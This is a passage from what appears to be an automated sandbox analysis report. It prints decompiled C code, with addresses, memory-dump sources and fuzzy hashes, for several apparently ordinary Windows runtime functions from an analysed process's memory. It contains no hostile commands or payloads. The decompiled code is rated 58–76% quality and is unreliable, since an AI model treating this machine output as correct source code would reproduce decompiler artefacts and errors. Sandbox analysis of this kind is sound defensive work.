						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4b2bc46;
						_t48 = E04BC7B9C(0x4c353e8, 0x4b2bc46, _t67, 0x4c353e8, _t70,  &_v140);
					}
				}
				return E04B8B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                    0x04b88ec7
                                                    0x04b88ed9
                                                    0x04b88edc
                                                    0x04b88ee6
                                                    0x04b88ee9
                                                    0x04b88eee
                                                    0x04b88efc
                                                    0x04b88f08
                                                    0x04bc1349
                                                    0x04bc1353
                                                    0x04bc135d
                                                    0x04bc1366
                                                    0x04bc136f
                                                    0x04bc1375
                                                    0x04bc137c
                                                    0x04bc1385
                                                    0x04bc1390
                                                    0x04bc1391
                                                    0x04bc139c
                                                    0x04bc139d
                                                    0x04bc13a6
                                                    0x04bc13ac
                                                    0x04bc13b2
                                                    0x04bc13b5
                                                    0x04bc13bc
                                                    0x04bc13bf
                                                    0x04bc13c2
                                                    0x04bc13c5
                                                    0x04bc13c8
                                                    0x04bc13cb
                                                    0x04bc13ce
                                                    0x04bc13d1
                                                    0x04bc13d4
                                                    0x04bc13d7
                                                    0x04bc13da
                                                    0x04bc13dd
                                                    0x04bc13e0
                                                    0x04bc13e3
                                                    0x04bc13e6
                                                    0x04bc13e9
                                                    0x04bc13f6
                                                    0x04bc1400
                                                    0x04bc1400
                                                    0x04b88f08
                                                    0x04b88f32

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9c16d03175ec409b6ec33f90e5dcabe7cf16ad1a8662ac6899a113c5503d325
                                                    • Instruction ID: d1deb2f0bd11c353342d72f4f313a8c42dbe613cbdc5ee5d078a8ae605f48893
                                                    • Opcode Fuzzy Hash: a9c16d03175ec409b6ec33f90e5dcabe7cf16ad1a8662ac6899a113c5503d325
                                                    • Instruction Fuzzy Hash: F841A2B1D00318AFDB24DFAAD980AADFBF4FB48314F5041AEE519A7201E7746A44CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B84A2C, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E04B84A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4c3d360 ^ _t62;
				_v8 =  *0x4c3d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04B62280(_t26, 0x4c38608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04B5FFB0(_t41, _t51, 0x4c38608);
						L2:
						 *0x4c3b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04B8B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04B62280(_t28, 0x4c38608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04B5FFB0(_t42, _t53, 0x4c38608);
							if(_t53 != 0) {
								L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04B5FFB0(_t41, _t51, 0x4c38608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                    0x04b84a2c
                                                    0x04b84a34
                                                    0x04b84a3c
                                                    0x04b84a3e
                                                    0x04b84a48
                                                    0x04b84a4b
                                                    0x04b84a4d
                                                    0x04b84a51
                                                    0x04b84a9c
                                                    0x00000000
                                                    0x00000000
                                                    0x04b84aa3
                                                    0x04b84aa8
                                                    0x04b84aad
                                                    0x04b84ab1
                                                    0x04b84ade
                                                    0x04b84ae3
                                                    0x04b84a5a
                                                    0x04b84a62
                                                    0x04b84a6a
                                                    0x04b84a6e
                                                    0x04bbf203
                                                    0x04b84a84
                                                    0x04b84a88
                                                    0x04b84a89
                                                    0x04b84a8a
                                                    0x04b84a95
                                                    0x04b84a95
                                                    0x04b84a79
                                                    0x04b84a80
                                                    0x04b84af2
                                                    0x04b84af4
                                                    0x04b84af9
                                                    0x04b84aff
                                                    0x04b84b01
                                                    0x04b84b03
                                                    0x04b84b08
                                                    0x04bbf20a
                                                    0x04bbf212
                                                    0x04bbf216
                                                    0x04bbf216
                                                    0x04b84b08
                                                    0x04b84b13
                                                    0x04b84b1a
                                                    0x04bbf229
                                                    0x04bbf229
                                                    0x04b84b1a
                                                    0x04b84a82
                                                    0x00000000
                                                    0x04b84a82
                                                    0x04b84ab7
                                                    0x04b84acd
                                                    0x04b84acd
                                                    0x04b84ad5
                                                    0x04b84ada
                                                    0x00000000
                                                    0x04b84ada
                                                    0x04b84ac2
                                                    0x04b84acb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b84acb
                                                    0x04b84a53
                                                    0x04b84a53
                                                    0x04b84a58
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b05c21cad767db644adaef566452849bf8bb710a3dbedc9015b1ffd18d855331
                                                    • Instruction ID: 362aec435c03bb7c9ea126336b8d03ac92c63ca5b0d12a1e29d61bf335a73664
                                                    • Opcode Fuzzy Hash: b05c21cad767db644adaef566452849bf8bb710a3dbedc9015b1ffd18d855331
                                                    • Instruction Fuzzy Hash: 3031F1322063119BDB21BF64C980B7AFBE5FB80B15F0008ADF8564B650E774F801CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7E730, Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E04B7E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04B89670() < 0) {
					L04B9DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4c37b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04B64620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04B7E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                    0x04b7e730
                                                    0x04b7e736
                                                    0x04b7e738
                                                    0x04b7e73d
                                                    0x04b7e73e
                                                    0x04b7e740
                                                    0x04b7e749
                                                    0x04b7e765
                                                    0x04b7e76a
                                                    0x04b7e76b
                                                    0x04b7e76c
                                                    0x04b7e76d
                                                    0x04b7e76e
                                                    0x04b7e76f
                                                    0x04b7e775
                                                    0x04b7e777
                                                    0x04b7e77e
                                                    0x04bbb675
                                                    0x04b7e784
                                                    0x04b7e784
                                                    0x04b7e789
                                                    0x04b7e7a8
                                                    0x04b7e7ac
                                                    0x04b7e807
                                                    0x04b7e7ae
                                                    0x04b7e7ae
                                                    0x04b7e7b1
                                                    0x04b7e7b4
                                                    0x04b7e7b9
                                                    0x04b7e7c0
                                                    0x04b7e7c4
                                                    0x04b7e7ca
                                                    0x04b7e7cc
                                                    0x00000000
                                                    0x04b7e7d3
                                                    0x04b7e7d6
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7e7ff
                                                    0x04b7e802
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7e7f9
                                                    0x04b7e7fc
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7e7f3
                                                    0x04b7e7f6
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7e7ed
                                                    0x04b7e7f0
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7e7e7
                                                    0x04b7e7ea
                                                    0x00000000
                                                    0x00000000
                                                    0x04bbb685
                                                    0x04bbb688
                                                    0x00000000
                                                    0x00000000
                                                    0x04bbb682
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7e7cc
                                                    0x04b7e7d9
                                                    0x04b7e7dc
                                                    0x04b7e7de
                                                    0x04b7e7de
                                                    0x04b7e7ac
                                                    0x04b7e7e4
                                                    0x04b7e74b
                                                    0x04b7e751
                                                    0x04b7e759
                                                    0x04b7e761
                                                    0x04b7e761

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28df29e037c327b88d3fd8bf2306c6be6c50f96af77135cf601ae203d3122d8c
                                                    • Instruction ID: 72a679bcb487253c360727936e15227ac33c5e3e781ece04d228e67cac7dacbe
                                                    • Opcode Fuzzy Hash: 28df29e037c327b88d3fd8bf2306c6be6c50f96af77135cf601ae203d3122d8c
                                                    • Instruction Fuzzy Hash: A4315C75A14249EFD744CF58D841B9AB7E8FF19314F1482AAF914CB341E635ED80CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7BC2C, Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E04B7BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4c36100; // 0x4c
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04B62280(0xd, 0x17d0f1a0);
				_t41 =  *0x4c360f8; // 0x0
				if(_t41 != 0) {
					 *0x4c360f8 =  *_t41;
					 *0x4c360fc =  *0x4c360fc + 0xffff;
				}
				E04B5FFB0(_t41, 0x800, 0x17d0f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4c360f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04B64620(0x4c36100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4c36100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                    0x04b7bc36
                                                    0x04b7bc42
                                                    0x04b7bc45
                                                    0x04b7bc4a
                                                    0x04b7bd35
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7bc50
                                                    0x04b7bc50
                                                    0x04b7bc58
                                                    0x04b7bc5a
                                                    0x04b7bc60
                                                    0x00000000
                                                    0x00000000
                                                    0x04bba4f2
                                                    0x04bba4f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04bba4fc
                                                    0x04b7bc79
                                                    0x04b7bc7e
                                                    0x04b7bc86
                                                    0x04b7bd16
                                                    0x04b7bd20
                                                    0x04b7bd20
                                                    0x04b7bc8d
                                                    0x04b7bc94
                                                    0x04b7bcbd
                                                    0x04b7bcca
                                                    0x04b7bccb
                                                    0x04b7bccc
                                                    0x04b7bccd
                                                    0x04b7bcce
                                                    0x04b7bcd4
                                                    0x04b7bcea
                                                    0x04b7bcee
                                                    0x04b7bcf2
                                                    0x04b7bd00
                                                    0x04b7bd04
                                                    0x00000000
                                                    0x04b7bc96
                                                    0x04b7bcab
                                                    0x04b7bcaf
                                                    0x04b7bd2c
                                                    0x04b7bd2c
                                                    0x04b7bd09
                                                    0x00000000
                                                    0x04b7bd09
                                                    0x04b7bcb1
                                                    0x04b7bcb5
                                                    0x04b7bcbb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04b7bcbb

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 340a433550efb1d22386028b2d545fd1d09d7e65674aadb54222a6fb45fab742
                                                    • Instruction ID: 8008a2db1e0fb807265ca932475db31bbd7dc18c3ee9b3ee5296260531670202
                                                    • Opcode Fuzzy Hash: 340a433550efb1d22386028b2d545fd1d09d7e65674aadb54222a6fb45fab742
                                                    • Instruction Fuzzy Hash: 3731FF3AA04605ABDB21DF58C4807A677A4EB1831AF0080B8ED64DB201E678FD059F80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B71DB5, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E04B71DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04B6F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04B64620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04B6F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                    0x04b71dc2
                                                    0x04b71dc5
                                                    0x04b71dc7
                                                    0x04b71dcc
                                                    0x04b71dce
                                                    0x04b71dd6
                                                    0x04b71ddf
                                                    0x04b71de0
                                                    0x04b71de1
                                                    0x04b71de5
                                                    0x04b71de8
                                                    0x04b71def
                                                    0x04b71df0
                                                    0x04b71df6
                                                    0x04b71df7
                                                    0x04b71dfe
                                                    0x04b71e1a
                                                    0x00000000
                                                    0x00000000
                                                    0x04b71e0b
                                                    0x04b71e12
                                                    0x04b71e12
                                                    0x04b71e00
                                                    0x04b71e00
                                                    0x04b71e05
                                                    0x04b71e1e
                                                    0x04b71e23
                                                    0x04bb570f
                                                    0x04bb5713
                                                    0x00000000
                                                    0x00000000
                                                    0x04bb5719
                                                    0x04bb5719
                                                    0x04b71e2c
                                                    0x04b71e2d
                                                    0x04b71e2e
                                                    0x04b71e2f
                                                    0x04b71e31
                                                    0x04b71e32
                                                    0x04b71e35
                                                    0x04b71e3d
                                                    0x04bb5723
                                                    0x04bb573d
                                                    0x04bb573d
                                                    0x00000000
                                                    0x04bb5723
                                                    0x04b71e49
                                                    0x04b71e4e
                                                    0x04b71e4e
                                                    0x04b71e09
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction ID: c1fbf0df63a8f8c04ba0d10b0cb019b64779a9c95d149ee2723d390184ed5371
                                                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                    • Instruction Fuzzy Hash: DE216B72600619AFD721CF9DDC80EAABBBDEF85684F2144A5E91597310DA34BE01DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B49100, Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E04B49100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4c1f6e8);
				E04B9D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04C188F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E04B9D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x4c386c0; // 0xc907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x4c386b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04B62280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E04C188F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E04B8AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x4c3b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x4c384c0;
										if(_t69 >=  *0x4c384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04C19063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E04B4922A(_t82);
							_t53 = E04B67D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04C18B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x4c386c0; // 0xc907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x4c386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x4c386bc;
										_t72 = 0x4c386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04B49240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x4c386c4;
									_t72 = 0x4c386c0;
									L18:
									E04B79B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                    0x04b49100
                                                    0x04b49100
                                                    0x04b49100
                                                    0x04b49100
                                                    0x04b49102
                                                    0x04b49107
                                                    0x04b4910c
                                                    0x04b49110
                                                    0x04b49115
                                                    0x04b49136
                                                    0x04b49143
                                                    0x04ba37e4
                                                    0x04ba37e4
                                                    0x04b49149
                                                    0x04b4914e
                                                    0x04b4914e
                                                    0x04b49117
                                                    0x04b4911d
                                                    0x00000000
                                                    0x00000000
                                                    0x04b4911f
                                                    0x04b49125
                                                    0x00000000
                                                    0x04b49151
                                                    0x04b49158
                                                    0x04b4915d
                                                    0x04b49161
                                                    0x04b49168
                                                    0x04ba3715
                                                    0x00000000
                                                    0x04b4916e
                                                    0x04b4916e
                                                    0x04b49175
                                                    0x04b49177
                                                    0x04b4917e
                                                    0x04b4917f
                                                    0x04b49182
                                                    0x04b49182
                                                    0x04b49187
                                                    0x04b49187
                                                    0x04b4918a
                                                    0x04b4918d
                                                    0x04b4918f
                                                    0x04b49192
                                                    0x04b49195
                                                    0x04b49198
                                                    0x04b49198
                                                    0x04b49198
                                                    0x04b4919a
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba371f
                                                    0x04ba3721
                                                    0x04ba3727
                                                    0x04ba372f
                                                    0x04ba3733
                                                    0x04ba3735
                                                    0x04ba3738
                                                    0x04ba373b
                                                    0x04ba373d
                                                    0x04ba3740
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba3746
                                                    0x04ba3749
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba374f
                                                    0x04ba3751
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba3757
                                                    0x04ba3759
                                                    0x04ba375c
                                                    0x04ba375c
                                                    0x04ba375e
                                                    0x04ba375e
                                                    0x04ba3761
                                                    0x04ba3764
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba3766
                                                    0x04ba3768
                                                    0x04ba37a3
                                                    0x04ba37a3
                                                    0x04ba37a5
                                                    0x04ba37a7
                                                    0x04ba37ad
                                                    0x04ba37b0
                                                    0x04ba37b2
                                                    0x04ba37bc
                                                    0x04ba37c2
                                                    0x04ba37c2
                                                    0x04ba37b2
                                                    0x04b49187
                                                    0x04b49187
                                                    0x04b4918a
                                                    0x04b4918d
                                                    0x04b4918f
                                                    0x04b49192
                                                    0x04b49195
                                                    0x00000000
                                                    0x04b49195
                                                    0x00000000
                                                    0x04b49187
                                                    0x04ba376a
                                                    0x04ba376a
                                                    0x04ba376c
                                                    0x04ba376c
                                                    0x04ba376f
                                                    0x04ba3775
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba3777
                                                    0x04ba3779
                                                    0x00000000
                                                    0x00000000
                                                    0x04ba3782
                                                    0x04ba3787
                                                    0x04ba3789
                                                    0x04ba3790
                                                    0x04ba3790
                                                    0x04ba378b
                                                    0x04ba378b
                                                    0x04ba378b
                                                    0x04ba3792
                                                    0x04ba3795
                                                    0x04ba3795
                                                    0x04ba3798
                                                    0x04ba3798
                                                    0x04ba379b
                                                    0x04ba379b
                                                    0x04b491a3
                                                    0x04b491a9
                                                    0x04b491b0
